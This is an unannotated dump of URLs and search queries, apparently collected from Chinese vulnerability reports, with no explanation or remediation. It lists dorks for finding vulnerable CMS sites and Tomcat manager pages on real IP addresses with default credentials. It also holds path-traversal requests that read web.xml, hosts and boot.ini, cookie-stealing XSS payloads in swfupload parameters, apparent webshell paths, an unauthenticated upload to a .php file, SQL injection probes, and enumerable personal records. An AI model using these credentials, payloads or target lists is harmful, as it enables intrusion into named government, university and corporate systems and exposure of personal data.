https://vpn.ruc.edu.cn/,DanaInfo=www.lib.ruc.edu.cn,SSO=U+ https://vpn.ruc.edu.cn/,DanaInfo=portal.ruc.edu.cn,SSO=U+ https://vpn.ruc.edu.cn/portal/media-type/html/user/admin/page/default.psml/js_pane/,DanaInfo=portal.ruc.edu.cn+P-11b54ab9353-1001a http://i.4399.cn/mobile/100434.html http://219.135.157.130/HomePageOut/index.jsp inurl:/article.php?action=show&id= http://www.hnmz.gov.cn/new/cms/article.php?action=show&id=1195 http://www.pjwsj.gov.cn/cms/article.php?action=show&id=76 http://www.hnxq.gov.cn/new/cms/article.php?action=show&id=387 http://www.cjpmp.com/cms/article.php?action=show&id=2432 http://www.hn5z.com/cms/article.php?action=show&id=778 http://www.hnmz.gov.cn/new/cms/ http://www.pjwsj.gov.cn/cms/ http://209.116.186.246/#newwindow=1&q=%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81:%E7%A7%91%E8%81%94%E7%BD%91%E7%BB%9C inurl:show.asp?D_id= http://209.116.186.246/#newwindow=1&q=%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81:%E6%B0%B8%E4%BF%A1%E7%BD%91%E7%BB%9C+inurl:show.asp%3FD_id%3D&start=20 http://www.sy9z.cn/other/show.asp?D_id=1062 http://sjc.sau.edu.cn/cwsj/show.asp?D_id=507 http://lnjxdc.com/news/show.asp?D_id=323 http://www.syhmc.net/s_show.asp?D_id=548 http://www.sykepu.com/news/news_show.asp?D_id=562 http://ayhqd.com/news_show.asp?D_id=936 http://www.meiycolor.com/news_show.asp?D_id=393 http://www.fygyp.cn/p_show.asp?D_id=3584 http://www.sytbd.com/product/show.asp?D_id=1211&d_cataid=A00910001 http://ccjjj.com/cases.aspx http://wooyun.org/bugs/wooyun-2014-058913 http://my.ikang.com/memberService/view/findExamRecordDetail?examid=12279725 http://my.ikang.com/memberService/view/findExamRecordDetail?examid=12279726 http://bbs.jd.com/ http://xiaoyou.ytu.edu.cn/article.php?type=news&id=118 http://www.ciwong.com/ http://www.jxrcw.com/gposinfo/freejobs/dwinfo.asp?dwrid=23e98a82fb9b35bacb7d1b2339bbb45b http://www.spta.cn/index.do www.spta.cn http://www.spta.cn http://211.162.69.49:8080/projects http://clicklog.moviebox.baofeng.com/phpinfo.php http://222.173.25.11/phpinfo.php http://服务器IP:8833/Report/clientsnapshot.aspx?disableHome=1&clientid= http://211.162.69.227:8081/loginAction_loginInit.action http://211.162.69.227:8081/loginAction!login.action http://graduate.ynnu.edu.cn/web_admin/index.aspx http://graduate.ynnu.edu.cn/uploads/down/cmd.asp http://rj.baidu.com/soft/detail/26608.html?ald http://www.wandoujia.com/apps/com.lenovo.videotalk.phone http://m.app.so.com/detail/index?pname=com.lenovo.videotalk.phone&id=811254 http://d.91.com/Soft/Android/com.polypoly-11.html www.chinapanda.org.cn/blog.php?id=1267 http://qzlx.nbsj.gov.cn/i_detail.asp?id=99&channel_id=1 http://oa.dld.com/ http://oa.dld.com/general/vmeet/wbUpload.php?fileName=test.php+ http://209.116.186.246/#newwindow=1&q=intitle:%E6%A0%A1%E5%9B%AD+%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%EF%BC%9A%E6%97%A0%E9%94%A1%E6%96%B0%E5%BA%A7%E6%A0%87%E6%95%99%E8%82%B2%E6%8A%80%E6%9C%AF%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8 inurl:TeacherSource.aspx?tid inurl:TeacherBlog.aspx?tid inurl:TeacherAlbums_New.aspx?tid inurl:TeacherBlogDetail.aspx?tid= inurl:TeacherArticle.aspx?KindID inurl:SchoolWeb/Web/TeacherSource.aspx?KindID inurl:AnnounAndNews.aspx?sid http://www.psgh.pudong-edu.sh.cn/dpma/FWeb/WorkRoomWeb/Web/TeacherSource.aspx?tid=3340010029 http://www.fstc.pdedu.sh.cn/dpma/FWeb/WorkRoomWeb/Web/TeacherSource.aspx?tid=3300010009 http://www.azxx.net/dpma/FWeb/WorkRoomWeb/Web/TeacherSource.aspx?tid=3050010054 http://www.azyry.com/dpma/FWeb/WorkRoomWeb/Web/TeacherSource.aspx?tid=3160010089 http://www.whwzyx.net/dpma/FWeb/WorkRoomWeb/Web/TeacherSource.aspx?tid=3180010060 http://www.whwzyx.net/dpma/FWeb/WorkRoomWeb/Web/TeacherBlog.aspx?tid=3180010065 http://szxy.ncjy.net/DPMA/FWeb/WorkRoomWeb/Web/TeacherBlog.aspx?tid=1000070004 http://www.ohedu.cn/dpma/FWeb/WorkRoomWeb/Web/TeacherBlog.aspx?tid=1050030116 http://www.gxqx.cn/DPMA/FWeb/WorkRoomWeb/Web/TeacherBlog.aspx?tid=3150010004 http://www.azyry.com/dpma/FWeb/WorkRoomWeb/Web/TeacherBlog.aspx?tid=3160010032 http://www.azxx.net/dpma/FWeb/WorkRoomWeb/Web/TeacherAlbums_New.aspx?tid=3050010032 http://www.psgh.pudong-edu.sh.cn/dpma/FWeb/WorkRoomWeb/Web/TeacherAlbums_New.aspx?tid=3340010026 http://www.fstc.pdedu.sh.cn/dpma/FWeb/WorkRoomWeb/Web/TeacherAlbums_New.aspx?tid=3300010009 http://www.whwzyx.net/dpma/FWeb/WorkRoomWeb/Web/TeacherAlbums_New.aspx?tid=3180010065 http://www.ohedu.cn/dpma/FWeb/WorkRoomWeb/Web/TeacherAlbums_New.aspx?tid=1050290019 http://www.gxqx.cn/DPMA/FWeb/WorkRoomWeb/Web/TeacherBlogDetail.aspx?tid=3150010008&diaryId=2122 http://221.224.56.74/DPMA/FWeb/WorkRoomWeb/Web/TeacherBlogDetail.aspx?tid=1030030030&diaryId=1082 http://www.psgh.pudong-edu.sh.cn/dpma/FWeb/WorkRoomWeb/Web/TeacherBlogDetail.aspx?tid=3340010034&diaryId=1000 http://www.h1906.net/dpma/FWeb/WorkRoomWeb/Web/TeacherBlogDetail.aspx?tid=3210010002&diaryId=4012 http://szxy.ncjy.net/DPMA/FWeb/WorkRoomWeb/Web/TeacherBlogDetail.aspx?tid=1000160027&diaryId=33341 http://www.ohedu.cn/dpma/FWeb/SchoolWeb/Web/TeacherArticle.aspx?KindID=1008_1001_1338&sid=105020 http://www.azxx.net/dpma/FWeb/SchoolWeb/Web/TeacherArticle.aspx?KindID=1007_1001_1017&sid=305001 http://www.azyry.com/dpma/FWeb/SchoolWeb/Web/TeacherArticle.aspx?KindID=1000_1000_1002&sid=316001 http://szxy.ncjy.net/DPMA/FWeb/SchoolWeb/Web/TeacherArticle.aspx?KindID=1007_1001_1005&sid=100004 http://www.h1906.net/DPMA/FWeb/SchoolWeb/Web/TeacherArticle.aspx?KindID=1007_1001_1005&sid=100004 http://www.gxqx.cn/dpma/FWeb/SchoolWeb/Web/TeacherSource.aspx?KindID=1007_1001_1000&User_Type=1&sid=315001 http://www.wxgxzx.net/dpma/FWeb/SchoolWeb/Web/TeacherSource.aspx?KindID=1001_1000_1001&sid=303001 http://szxy.ncjy.net/DPMA/FWeb/SchoolWeb/Web/TeacherSource.aspx?KindID=1006_1001_1643&sid=100050 http://www.whwzyx.net/dpma/FWeb/SchoolWeb/Web/TeacherSource.aspx?KindID=1004_1001_1000&sid=318001 http://www.azyry.com/dpma/FWeb/SchoolWeb/Web/TeacherSource.aspx?KindID=1001_1000_1009&sid=316001 http://www.fstc.pdedu.sh.cn/dpma/FWeb/SchoolWeb/Web/AnnounAndNews.aspx?Type_Anews=1&sid=330001 http://58.215.245.154/DPMA/FWeb/SchoolWeb/Web/AnnounAndNews.aspx?Type_Anews=2&sid=315001 http://szxy.ncjy.net/DPMA/FWeb/SchoolWeb/Web/AnnounAndNews.aspx?Type_Anews=2&sid=100034 http://www.azxx.net/dpma/FWeb/SchoolWeb/Web/AnnounAndNews.aspx?Type_Anews=1&sid=305001 http://www.ohedu.cn/dpma/FWeb/SchoolWeb/Web/AnnounAndNews.aspx?Type_Anews=1&sid=105020 http://home.focus.cn/zxrj/note_edit.php?action=edit&this_login_id=46028393¬e_id=369216 http://mpa.qdu.edu.cn/cn/Detail.aspx?id=345 http://ibc.qdu.edu.cn/showfeed/?classid=1 http://www.zj.10086.cn/zjydsns.zip http://mp.midea.com.cn/bsnems/engine_Engine_downEngine.do http://developer.baidu.com/rest/2.0/dev/v1/app/base/list2?callback=jQuery110100413025302879616_1404913266218&pn=1&ps=10&od_by=create_time&sort=asc,注入点&access_token=TOKEN&_=1404913266225 http://XXXX http://www.hr135.com/friend http://www.hr135.com/ask/index.php http://61.185.27.29:8080/ http://oa.dld.com/general/vmeet/wbUpload.php?fileName=test.php+ http://jyzd.xhu.edu.cn/more.asp?id=23 http://jyzd.xhu.edu.cn/news.asp?id=10822 http://jy.xhu.edu.cn/NEWS.asp?id=7337 http://www.baidu.com/s?tn=sitehao123&ie=utf-8&wd=%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%3A%E6%B5%B7%E6%9E%81%E7%BD%91%E7%BB%9C&oq=%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%3A%E6%B5%B7%E6%9E%81%E7%BD%91%E7%BB%9C&f=8&pn=20&rsv_page=1 http://www.gzzhineng.com/news_detail.asp?id=1624 http://www.photonbroadband.com.cn/News_detail.asp?id=66 http://www.xpcatv.com/newsdetail.asp?id=64 http://www.e-gtl.com/News_detail.asp?id=33 http://www.langxingdz.com/News_detail.asp?id=17 http://www.ipvod.cn/News_detail.asp?id=48 http://www.weibang360.com/newsdetail.asp?id=125 http://www.zdytl.com/product_detail.asp?id=64 http://www.gzfreeworld.com/messagedetail.asp?id=78 http://www.minmetals-gz.com/News/news_detail.asp?id=2141 http://www.bojess.com/news_detail.asp?id=11 http://www.fshs.com.cn/News_detail.asp?id=16 http://www.gzmeijia.com.cn/product_detail.asp?id=4243 http://www.reod.zju.edu.cn/product_show.asp?id=7480 http://git.oschina.com/ http://club.xywy.com/static/20130625/23731063.htm http://www.xnsj.gov.cn http://www.xnzgh.org http://www.hsxmsy.cn http://www.xnbb.gov.cn/ http://www.shunshan.gov.cn/ http://www.banqiao.gov.cn http://xctzb.swufe.edu.cn/list.aspx?keyword=1 xctzb.swufe.edu.cn/manage http://academy.yonyou.com http://academy.yonyou.com/ViewCourseMap.aspx?infoid=15 http://www.qc5qc.com/xqc/mlpxyy/mlpxcx_info.php?tid=1500100 http://www.qc5qc.com/xqc/mlpxyy/mlpxcx_info.php?tid=2500100 http://www.qc5qc.com/xqc/mlpxyy/mlpxcx_info.php?tid=1500100%27 https://www.google.com/search?newwindow=1&noj=1&biw=1024&bih=677&q=inurl%3Axxcontent.jsp%3Frowid&oq=inurl%3Axxcontent.jsp%3Frowid&gs_l=serp.3...7362.7362.0.7987.1.1.0.0.0.0.187.187.0j1.1.0....0...1c.1.49.serp..1.0.0.ZpMjnFhtfmU http://bbs.pageadmin.net/showtopic-28377.aspx http://baike.baidu.com/view/2843084.htm?fr=aladdin,网址http://www.shangxueba.com http://www.shangxueba.com/jingyan/1641941.html突然发现写的代码不见。 http://121.14.133.17:9010//resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://121.14.133.17:8090/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://121.14.133.7:5100//resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://121.14.133.7:8081/ http://www.xinyangcb.cn/ http://www.xinyangcb.cn/onews.asp?id=2630 http://www.e-cology.cn/systeminfo/sysadmin/sysadminEdit.jsp?id=1 http://127.0.0.1//cowork/CoworkLogView.jsp?id=151 http://127.0.0.1/system/basedata/basedata_role.jsp?roleid=32 http://127.0.0.1//system/basedata/basedata_hrm.jsp?resourceid=3 http://oa.udata.cn:88/login/Login.jsp http://oa.ahaxfz.com/login/Login.jsp http://oa.chinakingking.com/login/Login.jsp http://oa.ewell.cc:8080/login/Login.jsp http://thqm.wo.com.cn/thqm/searchCy.action http://jxjy.yzrsks.com/book/subbook.jsp?aid=1&nid=1 inurl:News/news_list.jsp http://www.ikang.com/ http://weixin.lenovo.com.cn/lenovo_admin_weixin/ http://121.14.133.28:8082/ http://121.14.133.28:8090//resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://121.14.133.46:9000/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://121.14.133.43:9000/ http://wcm.xxz.gov.cn:8080/wcm/ http://gk.sx******.gov.cn:8080/kdgs/ http://www.han****.gov.cn:8080/kdgs http://www.bdcgs.com/ http://www.bdcgs.com/bdcgs/newsone.jsp?tid=24 http://121.14.133.43:9000/.svn/entries http://cisse.casw.org.cn/announce.php?id=29 http://www.ziroom.com/event/?_p=cheer&_a=upload http://xuexi.jxgh.org.cn/Web/Course.aspx?typeid=38 http://m.dianwoba.com/h5/supplier/market!asynMarketItemList.do?currentPage=1&itemType=&keyword=*&market=1 http://www.agrij.com/) inurl:login_form.jsp http://www.baidu.com/s?tn=sitehao123&ie=utf-8&f=8&wd=%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%3A%E5%8D%97%E4%BA%AC%E6%A3%AE%E5%B8%95%E7%BD%91%E7%BB%9C&oq=%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%3A%E5%8D%97%E4%BA%AC%E6%A3%AE%E5%B8%95%E7%BD%91%E7%BB%9C&bs=%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%3A%E5%8D%97%E4%BA%AC%E6%A3%AE%E5%B8%95%E7%BD%91%E7%BB%9C&rsv_bp=1&inputT=95375&rsv_sug3=32&rsv_sug4=2156&rsv_sug1=2&rsv_sug=1 http://meeting.gdbnet.cn URLhttp://meeting.gdbnet.cn/MyBooks/ServerHandle/ http://meeting.gdbnet.cn/MyBooks/ServerHandle/GetDatas.aspx http://weixin.net05.cn/ http://weixin.net05.cn/login.html http://weixin.net05.cn/agencyAdmin/login.html http://www.eccn.com/events/2012/intel/news.html?info=2013012814280480 http://qts.rails.cn/ http://qts.rails.cn:80/qts/default.qts www.llrc.com.cn没发现什么明显的漏洞,看这张图 qq:635833 http://wowb.cn http://wowb.cn/index/huodong/index!getLastActivity.action http://www.skynj.com/ https://wen.lu/?gfe_rd=cr&ei=sgzPU8j1FqHJ8gfel4HQDQ&gws_rd=cr#q=inurl:homepages%2Fcontent_page.aspx http://www.xiangtan.gov.cn/cms/voteManager/seeresult_bz.jsp?titleid=1 http://kh.xiao5u.com/?sj=2014 inurl:asp?sort_id= http://209.116.186.246/#newwindow=1&q=%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%EF%BC%9A%E5%8E%A6%E9%97%A8%E6%98%93%E5%95%86%E7%BD%91%E7%BB%9C%E7%A7%91%E6%8A%80+inurl:asp%3Fsort_id%3D http://www.luchuankeji.com/List.asp?Shop_ID=930 http://www.rrkfw.com/List.asp?Shop_ID=991 http://www.xfym.net/products1.asp?sort_id=148 http://www.zzxsdz.com/product.asp?sort_id=148 http://www.shanghaizhongmin.com/product.asp?sort_id=148 http://www.luchuankeji.com/product.asp?sort_id=148 http://www.chinaguirong.com/product.asp?sort_id=148 URL:http://www.sxsj.gov.cn/index!reception inurl:ArticleShow.asp?ArticleID= http://209.116.186.246/#newwindow=1&q=%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%EF%BC%9A%E4%B8%87%E7%9B%88%E7%BD%91%E7%BB%9C+inurl:ArticleShow.asp%3FArticleID%3D http://www.nbhqly.com http://www.nbkc.com.cn http://www.nbbcly.com http://www.toyoung.net http://www.dh-ip.com http://ningbotm.net http://www.nbtianyu.com http://www.eszxun.com www.skynj.com inurl:homepages/index.aspx http://mec.ikang.com/log.txt http://mec.ikang.com/sqlnet.log http://wooyun.org/bugs/wooyun-2014-063744 http://www.hnpynx.com/ http://www.hnpynx.com/show.asp?class=2&id=1282 http://rahy.gov.cn/ ftp://rahy.gov.cn/ http://58.22.138.34:8080/login.html http://58.22.138.34/axis2-admin/upload http://58.22.138.34/axis2-admin/ http://58.22.138.35/cois/mobileOA.nsf/ http://58.22.138.35/cois/mobileoa.nsf/frmAnalysis http://58.22.138.35/cois/mobileoa.nsf/frmhome?openPage http://58.22.138.24/login.aspx http://bwc.ncu.edu.cn/new.asp?class=3&id=666 http://spm.ncu.edu.cn/static/NewsList.asp?Type=3 http://fxcs.ncu.edu.cn/xxggxs.asp?xxid=1 http://wap3.qiushibaike.com/login http://nearby.qiushibaike.com/user/100/detail http://pubmail.iscas.ac.cn/needlogin.action http://login.koolearn.com/sso/toBackPwd.do?nextPage=http%3A%2F%2Fi.koolearn.com%2F http://www.dapu.com/passport-sjzcstep2.html?mobile_number=13111111111&backurl=undefined http://61.144.78.156:8080/manager/html user:tomcat pass:tomcat http://61.144.78.156:8080/system/ http://www.hrbxzsp.gov.cn/www_web/index.jsp http://www.hrbxzsp.gov.cn:8080/template/yindao.htm http://www.hrbxzsp.gov.cn/viewggl.jsp?nid=126342 http://www.hrbxzsp.gov.cn:8080/template/zxbs/zxbs_bgxz_list.jsp http://www.hrbxzsp.gov.cn:8080/fileFetcherServlet?filePath=E:\hrbweb\WebRoot\WEB-INF\web.xml http://www.hrbxzsp.gov.cn/fileFetcherServlet?filePath=D:\HIGHCOM\jboss-4.0.4.GA\jboss-4.0.4.GA\server\default\deploy\xzsp_hrb_oracle.war\web.xml http://www.hrbxzsp.gov.cn:8080/fileFetcherServlet?filePath=C:\Windows\System32\drivers\etc\hosts http://www.fsmcms.com.cn/html/p/p_16/p_16.html http://mail.maimaibao.com/ http://www.ccnhongli.com/pShow.asp?classid=2&id=13 http://www.zjdegal.com/newsShow.asp?classid=1&id=9 http://www.wzxhkj.com.cn/news_show.asp?classid=2&id=11 http://cottonbaby.com.cn/pShow.asp?classid=2&id=6 http://beilaile.cn/pShow.asp?classid=6&id=32 http://aixjd.com/teastu_show.asp?classid=19&id=321 http://www.wzfa.org/news_show.asp?classid=9&id=35 http://www.cnxjsj.com/pro_show.asp?classid=8&id=2 http://www.cptshop.com/index.htm http://localhost/file/upload/201407/23/21-48-13-93-4.swf http://220.181.136.39:9080/icpv3.0/ConfigCenter)中,任何人可直接浏览或下载其他用户上传的身份证、核验单等电子文件 http://123.sankuai.com/ http://task.sankuai.com/,我只成功了一枚账号,密码123456。。。 https://sso.sankuai.com/login,成功了若干,单点登录之后,能做的事情就很多了。。。 http://cosmopolitan.joins.com/fashion/?strFCateCd=AAA0 http://qtv.joins.com/QTVprg/sunNmoon/?proIdx=177 http://122.194.14.77:8080/manager/html user:admin pass:123456 http://marx.ustb.edu.cn/Uploads/file/3.asp;%281%29.jpg http://marx.ustb.edu.cn/NewsConfig.aspx http://www.yesmywine.com/这个。百度一下也能收到,晒个图片吧!! http://mall.yesmywine.com/groupbuy/index.jspa http://web.ynufe.edu.cn/jiguan/rsc/showsecond.asp?id=495 url:http://116.236.243.4:80/manager/html user:admin pass:admin http://116.228.145.139 url:http://116.228.145.139:80/manager/html user:admin pass:admin http://gd.10086.cn/gzdh/yhzq/action/view.do?productId=000001#rd,点进去可以看到动态密码这一栏,手机号随便输然后点击获取 http://60.28.43.83:8096/consult/search/findSchoolInfo.action url:http://218.13.180.139:80/manager/html user:tomcat pass:tomcat https://121.18.214.106/ http://mta.nankai.edu.cn/news_con.php?nid=196 http://mta.nankai.edu.cn/news_con.php?nid=196 http://sqlmap.org http://xxgk.ustc.edu.cn/infoplat/toDetailPage.action?id=142 http://www.txrcb.com/ http://www.txrcb.com/shownews.asp?id=270 http://www.txrcb.com/mydown/login.asp http://www.xnxyls.com/culture_show.asp?id=210 url:http://61.135.22.1:80/manager/html user:admin pass:tomcat http://www.7stars.net.cn/ http://szj.erqi.gov.cn/fckeditor/editor/filemanager/browser/default/browser.html?Type=../../..&Connector=connectors/jsp/connector http://180.168.124.135/ http://cts.nankai.edu.cn/show.asp?id=57 http://cts.nankai.edu.cn/show.asp?id=57 http://sqlmap.org http://www.400apps.com/ www.cq.cn rdp://211.161.45.190:3389 rdp://220.115.240.66:3389 http://www.zqgwbn.com/install.asp http://www.gwbnah.net.cn/phpMyAdmin/ http://www.cdgwbn.com.cn/index.php?cate_id=13&m=Article&temp=c%3A%2Fboot.ini http://www.baomi.org/ http://www.baomi.org/bmyw_info.php?optionid=23&auto_id=1585 http://www.baomi.org/zytsyx_info.php?optionid=48&auto_id=82 http://www.baomi.org/bmyw.php?optionid=10 http://www.baomi.org/zytsyx.php?optionid=16 http://www.baomi.org/bmzz_news_info.php?optionid=58&auto_id=438 http://www.letv.com/houtai/ http://guojiadajuyuan.com/search.php?r=2014-07-25 http://122.226.213.169/music_actor.html?id=908 http://www.duba.com/music_actor.html?id=908 http://www2.lib.nankai.edu.cn/nav/Chinese/show/data_detail.asp?name= http://www2.lib.nankai.edu.cn/nav/Chinese/show/data_ http://sqlmap.org http://www.sxwsks.com/system_dntb/uploadFile.aspx http://pharmacy.nankai.edu.cn/english/article.php?article=24 http://pay.nankai.edu.cn/phpmyadmin/ http://pay.nankai.edu.cn/?phpinfo=1 http://www.cofcorice.com/ability/ViewResume.aspx?Userid=32 http://www.cofcorice.com/ability/ViewResume.aspx?Userid=1 http://www.cofcorice.com/ability/ViewResume.aspx?Userid=2 http://www.cofcorice.com/ability/ViewResume.aspx?Userid=3 http://bbs.gexia.com/thread-32-593575.aspx http://bbs.gexia.com/dialog/forget.aspx?publishmentSystemID=1 http://wooyun.org/bugs/wooyun-2014-065197 http://www.crbcint.com/lqcms/net/Content.action?version=1 http://www.kuaifan.net; site:t.iqiyi.com inurl:php t.iqiyi.com/pub/jump.php http://www.cicro.com/ inurl:/browser/content.jsp?id= http://www.xy.gov.cn/jsp/zwgk/browser/content.jsp?id=476 http://www.zb.gov.cn/jsp/zwgk/browser/content.jsp?id=23 http://www.xjmd.gov.cn/jsp/zwgk/browser/content.jsp?id=2439 http://www.dyq.gov.cn/jsp/zwgk/browser/content.jsp?id=46 http://sj.shufe.edu.cn/jsp/qikan/browser/content.jsp?id=6918 http://u.ly169.cn/icbc/admin/login.asp http://www.jlnanx.com/asktotal.jsp?type=0&pid=22 http://218.201.4.5/security/login.do http://222.223.34.25/gpsweb/index.aspx http://www.sogou.com//websnapshot?ie=utf8&url=http%3A%2F%2Fqq.mb5u.com%2Fabout.html&did=65b505059bf9e58d-1152efedfc5effe9-134fa5d0b31d02dc09750e547cb02b87&k=fd2b0d13138196abc9b801bca9d59b27&encodedQuery=&query=qq.mb5u.com%2Fabout.html&&pid=sogou-wsse-7535bbb91c8fde34&duppid=1&w=01020400&m=0&st=0&uid=1250&ref=&furl=http%3A%2F%2Ftongjige.com%2F&title=%E7%BB%9F%E8%AE%A1%E5%93%A5_%E8%90%A5%E9%94%80%E7%8E%8B_%E8%AE%BF%E5%AE%A2QQ%E7%BB%9F%E8%AE%A1-%E8%AE%BF%E5%AE%A2QQ%E6%8A%93%E5%8F%96--%E8%AE%BF%E5%AE%A2QQ%E6%8F%90%E5%8F%96-%E7%BD%91%E7%AB%99%E8%AE%BF%E5%AE%A2QQ%E7%BB%9F%E8%AE%A1%E7%B3%BB%E7%BB%9F-%E7%BD%91%E7%AB%99%E8%AE%BF%E5%AE%A2QQ%E6%8A%93%E5%8F%96%E7%B3%BB%E7%BB%9F-%E7%BD%91%E7%AB%99%E8%AE%BF%E5%AE%A2QQ%E8%8E%B7%E5%8F%96%E7%B3%BB%E7%BB%9F-%E7%BD%91%E7%AB%99%E8%AE%BF%E5%AE%A2QQ%E6%8F%90%E5%8F%96%E7%B3%BB%E7%BB%9F-%E7%BD%91%E7%AB%99%E7%BB%9F%E8%AE%A1QQ%E7%B3%BB%E7%BB%9F%E6%BA%90%E7%A0%81%7C%E8%AE%BF%E5%AE%A2QQ%E7%BB%9F%E8%AE%A1%7CQQ%E8%AE%BF%E5%AE%A2%E7%BB%9F%E8%AE%A1 http://user.app.xywy.com/myplus.php?act=detail&type=1&plusid=175357 http://www.fenby.com/course/units/1058 coding:utf8 http://gzbzt.com/forum/view.php?id=2 http://114.80.121.203:8000/zabbix inurl:siweb/login.do http://218.9.***.***:8082/siweb/ http://60.219.***.***:7001/siweb http://218.9.***.***:8081/siweb http://111.75.***.***:8001/siweb http://***.***.gov.cn:8001/siweb/ http://www.dapu.com/product-askdetail-696-35542.html http://www.dapu.com/product-askdetail-879-35562.html http://www.shopin.net/ http://bf.baidu.com/ http://bf.baidu.com/team/detail/282591 http://bf.baidu.com/team/detail/282591 s.blued.cn/users/786461 www.kouclo.com http://shop.kouclo.com/business/login Url:http://api.xiniugushi.com:80/function/account.php http://www.baixing.com:80/xinxi/delete?adId=文章ID&view=0 http://www.51lepai.com/website.rar http://124.205.90.244 url:http://124.205.90.244:8080/manager/html user:admin pass:admin http://221.232.136.62:91/pm/sys/Login_dologin.action url:http://125.64.93.214:8080/manager/html user:tomcat pass:tomcat url:http://218.7.71.244:8080/manager/html user:tomcat pass:tomcat url:http://222.33.62.22:8080/manager/html user:tomcat pass:tomcat http://v2.freep.cn/3tb_14072610260155ef512293.jpg http://bbs.qibosoft.com/down2.php?v=download1.0#down http://www.zjubiolab.zju.edu.cn/lesson/news.php?action=show&id=991 http://yunfeng.zju.edu.cn/news.php?action=show&id=3943 www.zchospital.com/cms/ www.zjqhyy.com/cms/ www.zjhl.org/cms www.ywzxyy.com/cms/ www.z2hospital.com/cms www.zjtongde.com/cms/ www.ks2y.com/cms/ nhdyyy.com/cms/ www.hnzyy.cn/cms/ www.zjukidney.com/cms/ www.zjukidney.com/cms/ http://stat.ccidnet.com/seo/help.php http://hdy.njmu.edu.cn/jnt/jnt_grda_jnwx_read.php?id=319¤tJNTId=58 http://hdy.njmu.edu.cn/jnt/jnt_grda_jnwx_read.php?id= http://sqlmap.org https://211.68.223.12/vpnweb/help.php?para=index https://211.68.223.12/vpnweb/help.php https://219.129.33.114:10009/vpnweb/help.php http://demo.dtcms.net/scripts/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// http://host.emlog.net/include/lib/js/uploadify/uploadify.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// http://blog.qiyuuu.com/include/lib/js/uploadify/uploadify.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// http://be-evil.org/include/lib/js/uploadify/uploadify.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// http://www.mldw.gov.cn/data/myweb/bmxx/news/shtml/102/index.html http://www.qhdzfzz.gov.cn/images/pr/790/index.asp http://www.sdqx.gov.cn/fbxx/xxfk/1140/index.html http://yjsb.xijing.edu.cn/Zongg/xppic/cert/337/index.html http://www.xjgt.gov.cn/JS/FreeJs/cert/3792/index.html http://www.kelkfq.gov.cn/fckeditor/editor/dtd/1659/index.html http://www.dege.gov.cn/Styles/yx/WN5/index.asp http://xydj.xiaoyi.gov.cn/editor/58639/578/379/947/index.asp http://www.mldw.gov.cn/data/myweb/bmxx/news/shtml/102/index.html http://www.yunfufgj.gov.cn/download/qp1/mxBQx/pcQOX/PeXI4/index.asp http://www.czmz.gov.cn/images/hgio;/3792/index.html http://www.qzx.gov.cn/image/kyufxs/267/index.html http://www.mldw.gov.cn/data/myweb/bmxx//html/info/340/index.html http://www.dege.gov.cn/Styles/yx/um5/index.asp http://www.xjgt.gov.cn/JS/FreeJs/cert/3792/index.html http://www.mldw.gov.cn/data/myweb/bmxx/news/shtml/21/index.html http://tzb.xiaoyi.gov.cn/smartstat/1620/5011/42898/0036/index.asp http://www.mldw.gov.cn/data/myweb/bmxx/news/shtml/125/index.html http://ccfx.changchun.gov.cn/blog.nolog/SCRIPT/common/8329/index.html http://www.jyqwsj.gov.cn/bbs//2507/ http://tjj.sqsc.gov.cn/jsrun/14008.html http://tzb.xiaoyi.gov.cn/smartstat/03199/0760/80727/088/index.asp http://www.zgtks.gov.cn/dwjs/dwtd/1297/index.html http://tzb.xiaoyi.gov.cn/smartstat/75067/766/666/5397/index.asp http://www.sdqx.gov.cn/fbxx/xxfk/1140/index.html http://www.yunfufgj.gov.cn/download/kCuD/ShdK/Nfp6/5kN/index.asp http://www.sdqx.gov.cn/fbxx/xxfk/1689/index.html http://www.dege.gov.cn/styles/yx/u910/index.asp http://www.dfzb.suzhou.gov.cn/2035/index.asp http://tzb.xiaoyi.gov.cn/smartstat/75067/51495/6840/82784/index.asp http://3dbae.xadrc.gov.cn/ http://tzb.xiaoyi.gov.cn/smartstat/1066/642/552/3129/index.asp http://www.hhhtjxw.gov.cn/person/jkld/index.html http://tjj.sqsc.gov.cn/upLoadFile/uploadfile/zontes/5170/index.html http://www.agrij.com/) inurl:login_form.jsp http://www.jsxyidc.com/ http://down.chinaz.com/soft/30486.htm http://localhost:58031/online.asp http://localhost:58031/common.asp?id=1 http://localhost:58031/news.asp?id=3 http://localhost:58031/shownews.asp?id=66 http://localhost:58031/showkbxx.asp?id=32 http://localhost:58031/showgkk.asp?id=4 http://localhost:58031/showpxxm.asp?id=24 http://localhost:58031/showteam.asp?id=35 http://localhost:58031/showdownload.asp?id=19 http://localhost:58031/showxyzp.asp?id=35 http://unhr.com.cn/ http://www.szyfpx.com/online.asp http://www.hssjy.com/online.asp http://www.hbwfds.gov.cn/online.asp http://www.duowencw.com/online.asp http://www.btwx.cn/online.asp http://202.199.240.28/jgzx/online.asp http://www.ephpzx.com/online.asp http://www.wcsqsnhdzx.com/online.asp http://qingyiclub.com/online.asp http://www.shapancmi.org/online.asp inurl:showxyzp.asp?id= site:gov.cn inurl:showpxxm.asp?id= site:gov.cn inurl:online.asp http://www.hssjy.com/shownews.asp?id=66 http://202.199.240.28/jgzx/showpxxm.asp?id=35 http://www.ephpzx.com/shownews.asp?id=199 